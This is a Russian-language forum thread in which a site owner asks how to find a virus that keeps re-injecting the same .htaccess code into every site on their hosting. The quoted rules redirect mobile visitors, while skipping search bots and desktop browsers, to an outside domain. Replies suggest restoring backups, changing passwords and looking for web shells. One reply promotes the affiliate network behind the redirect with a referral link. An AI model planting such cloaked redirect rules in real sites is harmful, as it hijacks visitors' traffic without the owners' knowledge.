Как обнаружить вирус на хостинге?

ademags ademags   02.03.2014 09:41   1 571  
Здраствууйте.На хостинге на всех сайтах прописывается в файле htaccess следующий код 
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]RewriteCond %{HTTP_USER_AGENT}  [NC,OR]RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]RewriteCond %{HTTP:Profile} .+ [NC,OR]RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
RewriteCond %{QUERY_STRING} !noredirect [NC]RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
RewriteRule ^(.*)$ http://moblao.com/e/9258 [L,R=302]

Очищал,он автоматически прописывается снова,как обнаружить и где?

Ответы на вопрос (5) Написать ответ
aesculapius aesculapius   02.03.2014 12:04
Попробуй просканировать все скрипты на наличие "htaccess" (и других слов во вредоносном коде, хотя они могут быть и закодированы). Установи запрет на запись для файла htaccess
0
Roman2002 Roman2002   02.03.2014 12:40
Разверните старый бекап, который был до заражения, и сравните старые файлы и новые.
0
Lavr Lavr   02.03.2014 13:23
Рекомендую ко всему выше сказанному ещё найти кудой предпологаемый вирус мог попасть. Зачастую несвоевременное обновление движка от дыр, может стать причиной. Вспомните, не давали ли кому нибудь доступ (например дизайнерам, программистам) Не менее правильным будет смена всех паролей.
Пройдитесь антивирусом по папке upload, там у меня раньше частенько появлялись так называемые шелы.
0
w3bank w3bank   02.03.2014 21:12
это знаменитая партнерка по моб трафу MobiLabs.
рекомендую даже регнутся в ней http://w3bank.ru/go/11
конверт сумасшедший у них,у некоторых даже 1:1.
по поводу того что ставят Вам код - меняйте пароль на FTP,на базу данных,на админку и ищите шеллы по логам сервера или по логам Google Analytics если конечно у Вас он установлен.
можете попросить помощи у хостера,он сможет глянуть по логам сервера.
0
stopvirus-by stopvirus-by   03.03.2014 14:36
Могу помочь с решением проблемы сканирую сайты на наличие вирусов уязвимости.
Очищаю сайт от вирусов и предоставляю защиту от вирусов если интересно стучи Лигин Skype Stopvirus.by
0

Войдите, чтобы написать ответ
Вход Регистрация

C ТОП50 в ТОП5 с помощью поведенческих факторов в Яндексе и Google.